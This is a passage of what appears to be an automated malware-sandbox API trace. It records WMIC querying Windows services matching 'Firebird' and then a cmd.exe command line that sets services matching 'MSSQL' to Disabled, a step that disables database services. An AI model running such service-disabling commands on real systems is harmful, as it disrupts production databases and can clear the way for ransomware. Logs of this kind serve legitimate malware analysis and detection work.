lpString2="write", cchCount2=5) returned 1 [0113.755] lstrlenW (lpString="In") returned 2 [0113.755] lstrlenW (lpString="In") returned 2 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0113.755] SafeArrayGetElement (in: psa=0x86f4c0, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.755] lstrlenW (lpString="true") returned 4 [0113.755] lstrlenW (lpString="True") returned 4 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0113.755] IUnknown:Release (This=0x892688) returned 0x1 [0113.755] SafeArrayGetElement (in: psa=0x86f310, rgIndices=0x50ea74, pv=0x50ea94 | out: pv=0x50ea94) returned 0x0 [0113.755] IWbemClassObject:Get (in: This=0x8929c0, wszName="Name", lFlags=0, pVal=0x50ea3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86210c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.755] IWbemClassObject:Get (in: This=0x8929c0, wszName="QualifierValue", lFlags=0, pVal=0x50ea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f4c0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea14*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f550*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x862a08, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.755] SafeArrayGetLBound (in: psa=0x86f550, nDim=0x1, plLbound=0x50ea58 | out: plLbound=0x50ea58) returned 0x0 [0113.755] SafeArrayGetUBound (in: psa=0x86f550, nDim=0x1, plUbound=0x50ea38 | out: plUbound=0x50ea38) returned 0x0 [0113.755] lstrlenW (lpString="CIMTYPE") returned 7 [0113.755] lstrlenW (lpString="ValueMap") returned 8 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0113.755] lstrlenW (lpString="read") returned 4 [0113.755] lstrlenW (lpString="ValueMap") returned 8 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0113.755] lstrlenW (lpString="write") returned 5 [0113.755] lstrlenW (lpString="ValueMap") returned 8 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0113.755] lstrlenW (lpString="In") returned 2 [0113.755] lstrlenW (lpString="ValueMap") returned 8 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0113.755] lstrlenW (lpString="Out") returned 3 [0113.755] lstrlenW (lpString="ValueMap") returned 8 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0113.755] SafeArrayGetElement (in: psa=0x86f550, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.755] SafeArrayGetElement (in: psa=0x86f550, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.755] SafeArrayGetElement (in: psa=0x86f550, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.755] SafeArrayGetElement (in: psa=0x86f550, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.756] SafeArrayGetElement (in: psa=0x86f550, rgIndices=0x50ea80, pv=0x50ea88 | out: pv=0x50ea88) returned 0x0 [0113.756] SysStringLen (param_1="ValueMap") returned 0x8 [0113.756] SysStringLen (param_1="In") returned 0x2 [0113.756] SysStringLen (param_1="In") returned 0x2 [0113.756] SysStringLen (param_1="ValueMap") returned 0x8 [0113.756] IUnknown:Release (This=0x8929c0) returned 0x1 [0113.756] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.756] IUnknown:Release (This=0x8923d0) returned 0x1 [0113.756] IUnknown:Release (This=0x891338) returned 0x1 [0113.756] IUnknown:Release (This=0x8850e8) returned 0x0 [0113.757] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.757] lstrlenW (lpString="/") returned 1 [0113.757] lstrlenW (lpString="Disabled") returned 8 [0113.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0113.757] lstrlenW (lpString="-") returned 1 [0113.757] lstrlenW (lpString="Disabled") returned 8 [0113.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0113.757] lstrlenW (lpString="Disabled") returned 8 [0113.757] lstrlenW (lpString="Disabled") returned 8 [0113.757] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.757] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.757] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc1d4e28e | out: _String="Select", _Context=0xc1d4e28e) returned="Select" [0113.757] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e28e | out: _String=0x0, _Context=0xc1d4e28e) returned="*" [0113.757] lstrlenW (lpString="FROM") returned 4 [0113.757] lstrlenW (lpString="*") returned 1 [0113.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0113.757] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e28e | out: _String=0x0, _Context=0xc1d4e28e) returned="from" [0113.757] lstrlenW (lpString="FROM") returned 4 [0113.757] lstrlenW (lpString="from") returned 4 [0113.757] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0113.757] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e28e | out: _String=0x0, _Context=0xc1d4e28e) returned="Win32_Service" [0113.758] lstrlenW (lpString="SET") returned 3 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0113.758] lstrlenW (lpString="CREATE") returned 6 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0113.758] lstrlenW (lpString="GET") returned 3 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0113.758] lstrlenW (lpString="LIST") returned 4 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0113.758] lstrlenW (lpString="ASSOC") returned 5 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0113.758] WbemLocator:IUnknown:AddRef (This=0x836ed8) returned 0x3 [0113.758] lstrlenW (lpString="") returned 0 [0113.758] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0113.758] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.758] lstrlenW (lpString="LHNIWSJ") returned 7 [0113.758] GetCurrentThreadId () returned 0xed8 [0113.758] GetCurrentProcess () returned 0xffffffff [0113.758] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x50f590 | out: TokenHandle=0x50f590*=0x270) returned 1 [0113.758] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x50f58c | out: TokenInformation=0x0, ReturnLength=0x50f58c) returned 0 [0113.758] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xad9148, TokenInformationLength=0x118, ReturnLength=0x50f58c | out: TokenInformation=0xad9148, ReturnLength=0x50f58c) returned 1 [0113.758] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xad9148*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0113.758] CloseHandle (hObject=0x270) returned 1 [0113.758] lstrlenW (lpString="GET") returned 3 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0113.758] lstrlenW (lpString="LIST") returned 4 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0113.758] lstrlenW (lpString="SET") returned 3 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] lstrlenW (lpString="CALL") returned 4 [0113.758] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0113.759] ??0CHString@@QAE@XZ () returned 0x50f550 [0113.759] GetCurrentThreadId () returned 0xed8 [0113.759] SysStringLen (param_1="\\\\") returned 0x2 [0113.759] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0113.759] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0113.759] SysStringLen (param_1="\\") returned 0x1 [0113.759] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0113.759] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0113.759] WbemLocator:IWbemLocator:ConnectServer (in: This=0x836ed8, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x8606e0) returned 0x0 [0113.765] CoSetProxyBlanket (pProxy=0x8606e0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.765] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.765] ??0CHString@@QAE@XZ () returned 0x50f54c [0113.765] GetCurrentThreadId () returned 0xed8 [0113.765] lstrlenA (lpString="") returned 0 [0113.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xad3b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.765] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.765] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.765] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc1d4e32a | out: _String="Select", _Context=0xc1d4e32a) returned="Select" [0113.765] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e32a | out: _String=0x0, _Context=0xc1d4e32a) returned="*" [0113.765] lstrlenW (lpString="FROM") returned 4 [0113.765] lstrlenW (lpString="*") returned 1 [0113.765] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0113.765] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e32a | out: _String=0x0, _Context=0xc1d4e32a) returned="from" [0113.765] lstrlenW (lpString="FROM") returned 4 [0113.765] lstrlenW (lpString="from") returned 4 [0113.765] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0113.765] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e32a | out: _String=0x0, _Context=0xc1d4e32a) returned="Win32_Service" [0113.766] IWbemServices:GetObject (in: This=0x8606e0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x50f524*=0x0, ppCallResult=0x0 | out: ppObject=0x50f524*=0x8badb0, ppCallResult=0x0) returned 0x0 [0113.799] IWbemClassObject:GetMethod (in: This=0x8badb0, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x50f530, ppOutSignature=0x50f51c | out: ppInSignature=0x50f530*=0x8bb2a0, ppOutSignature=0x50f51c*=0x8bb620) returned 0x0 [0113.799] IWbemClassObject:SpawnInstance (in: This=0x8bb2a0, lFlags=0, ppNewInstance=0x50f53c | out: ppNewInstance=0x50f53c*=0x8bb818) returned 0x0 [0113.800] IWbemClassObject:GetNames (in: This=0x8bb2a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x50f540 | out: pNames=0x50f540*="\x01ƀ\x04") returned 0x0 [0113.800] SafeArrayGetLBound (in: psa=0x86f340, nDim=0x1, plLbound=0x50f4ec | out: plLbound=0x50f4ec) returned 0x0 [0113.800] SafeArrayGetUBound (in: psa=0x86f340, nDim=0x1, plUbound=0x50f534 | out: plUbound=0x50f534) returned 0x0 [0113.800] SafeArrayGetElement (in: psa=0x86f340, rgIndices=0x50f528, pv=0x50f550 | out: pv=0x50f550) returned 0x0 [0113.800] IWbemClassObject:GetPropertyQualifierSet (in: This=0x8bb818, wszProperty="StartMode", ppQualSet=0x50f410 | out: ppQualSet=0x50f410*=0x866ad8) returned 0x0 [0113.800] IWbemQualifierSet:Get (in: This=0x866ad8, wszName="CIMTYPE", lFlags=0, pVal=0x50f3e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x50f3e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0113.800] IWbemClassObject:Get (in: This=0x8bb818, wszName="StartMode", lFlags=0, pVal=0x50f3b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x50f3f4*=5305308, plFlavor=0x0 | out: pVal=0x50f3b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x50f3f4*=8, plFlavor=0x0) returned 0x0 [0113.800] IWbemQualifierSet:Get (in: This=0x866ad8, wszName="read", lFlags=0, pVal=0x50f3f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x50f3f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0113.800] IWbemQualifierSet:Get (in: This=0x866ad8, wszName="write", lFlags=0, pVal=0x50f3f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x50f3f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0113.800] IWbemQualifierSet:Get (in: This=0x866ad8, wszName="Description", lFlags=0, pVal=0x50f3d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x50f3d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0113.800] lstrlenA (lpString="Not Available") returned 13 [0113.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0xad92b8, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0113.800] IUnknown:Release (This=0x866ad8) returned 0x0 [0113.801] lstrlenW (lpString="StartMode") returned 9 [0113.801] lstrlenW (lpString="StartMode") returned 9 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0113.801] SysStringLen (param_1="In") returned 0x2 [0113.801] SysStringLen (param_1="MaxLen") returned 0x6 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] SysStringLen (param_1="MaxLen") returned 0x6 [0113.801] SysStringLen (param_1="MaxLen") returned 0x6 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] lstrlenW (lpString="") returned 0 [0113.801] lstrlenW (lpString="STRING") returned 6 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0113.801] lstrlenW (lpString="string") returned 6 [0113.801] lstrlenW (lpString="STRING") returned 6 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0113.801] SysStringLen (param_1="In") returned 0x2 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] SysStringLen (param_1="ValueMap") returned 0x8 [0113.801] lstrlenW (lpString="Boot") returned 4 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0113.801] lstrlenW (lpString="System") returned 6 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0113.801] lstrlenW (lpString="Automatic") returned 9 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0113.801] lstrlenW (lpString="Manual") returned 6 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] lstrlenW (lpString="Disabled") returned 8 [0113.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0113.802] IWbemClassObject:GetPropertyQualifierSet (in: This=0x8bb818, wszProperty="StartMode", ppQualSet=0x50f418 | out: ppQualSet=0x50f418*=0x866ad8) returned 0x0 [0113.802] IWbemQualifierSet:Get (in: This=0x866ad8, wszName="CIMTYPE", lFlags=0, pVal=0x50f3fc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x50f3fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0113.802] IWbemClassObject:Get (in: This=0x8bb818, wszName="StartMode", lFlags=0, pVal=0x50f3ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x50f40c*=5304716, plFlavor=0x0 | out: pVal=0x50f3ec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x50f40c*=8, plFlavor=0x0) returned 0x0 [0113.802] IUnknown:Release (This=0x866ad8) returned 0x0 [0113.802] lstrlenW (lpString="string") returned 6 [0113.802] lstrlenW (lpString="string") returned 6 [0113.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0113.802] IWbemClassObject:Put (This=0x8bb818, wszName="StartMode", lFlags=0, pVal=0x50f4b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Disabled", varVal2=0xb9cd3f71), Type=0) returned 0x0 [0113.802] IUnknown:Release (This=0x8bb2a0) returned 0x0 [0113.802] IUnknown:Release (This=0x8bb620) returned 0x0 [0113.802] IUnknown:Release (This=0x8badb0) returned 0x0 [0113.803] ??0CHString@@QAE@XZ () returned 0x50f3fc [0113.803] GetCurrentThreadId () returned 0xed8 [0113.803] lstrlenA (lpString="") returned 0 [0113.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xad9c70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.803] lstrlenA (lpString="") returned 0 [0113.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xad9c70, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0113.803] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.803] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0113.803] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc1d4e4b2 | out: _String="Select", _Context=0xc1d4e4b2) returned="Select" [0113.803] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e4b2 | out: _String=0x0, _Context=0xc1d4e4b2) returned="*" [0113.803] lstrlenW (lpString="FROM") returned 4 [0113.804] lstrlenW (lpString="*") returned 1 [0113.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0113.804] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e4b2 | out: _String=0x0, _Context=0xc1d4e4b2) returned="from" [0113.804] lstrlenW (lpString="FROM") returned 4 [0113.804] lstrlenW (lpString="from") returned 4 [0113.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0113.804] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc1d4e4b2 | out: _String=0x0, _Context=0xc1d4e4b2) returned="Win32_Service" [0113.804] lstrlenA (lpString="SELECT * FROM ") returned 14 [0113.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xad9c70, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0113.804] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0113.804] SysStringLen (param_1="Win32_Service") returned 0xd [0113.804] lstrlenA (lpString=" WHERE ") returned 7 [0113.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xad8e30, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0113.804] SysStringLen (param_1=" WHERE ") returned 0x7 [0113.804] SysStringLen (param_1="caption LIKE '%Firebird%'") returned 0x19 [0113.804] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0113.804] SysStringLen (param_1=" WHERE caption LIKE '%Firebird%'") returned 0x20 [0113.804] IWbemServices:ExecQuery (in: This=0x8606e0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%Firebird%'", lFlags=48, pCtx=0x0, ppEnum=0x50f404 | out: ppEnum=0x50f404*=0x885658) returned 0x0 [0113.811] CoSetProxyBlanket (pProxy=0x885658, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.814] IEnumWbemClassObject:Next (in: This=0x885658, lTimeout=-1, uCount=0x1, apObjects=0x50f408, puReturned=0x50f3f4 | out: apObjects=0x50f408*=0x0, puReturned=0x50f3f4*=0x0) returned 0x1 [0114.355] IUnknown:Release (This=0x885658) returned 0x0 [0114.356] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.356] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.356] GetCurrentThreadId () returned 0xed8 [0114.356] ??0CHString@@QAE@PBG@Z () returned 0x50f5c0 [0114.356] ??YCHString@@QAEABV0@PBG@Z () returned 0x50f5c0 [0114.356] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xada0f8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0114.356] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0114.356] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xad9c70, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0114.356] __iob_func () returned 0x77ac1208 [0114.356] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0114.357] __iob_func () returned 0x77ac1208 [0114.358] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0114.358] ??1CHString@@QAE@XZ () returned 0x1 [0114.358] IUnknown:Release (This=0x8606e0) returned 0x0 [0114.359] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0114.359] _kbhit () returned 0x0 [0114.360] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0114.360] WbemLocator:IUnknown:Release (This=0x836ed8) returned 0x2 [0114.360] IUnknown:Release (This=0x8605f0) returned 0x0 [0114.360] IUnknown:Release (This=0x860690) returned 0x0 [0114.361] WbemLocator:IUnknown:Release (This=0x836ed8) returned 0x1 [0114.361] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0114.361] WbemLocator:IUnknown:Release (This=0x836ed8) returned 0x0 [0114.362] CoUninitialize () [0114.390] exit (_Code=0) [0114.390] ??1CHString@@QAE@XZ () returned 0x74a66430 [0114.390] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 241 os_tid = 0xedc Thread: id = 242 os_tid = 0xee0 Thread: id = 243 os_tid = 0xee4 Thread: id = 244 os_tid = 0xee8 Process: id = "52" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x75f0f000" os_pid = "0xeec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL ChangeStartMode 'Disabled'" cur_dir = 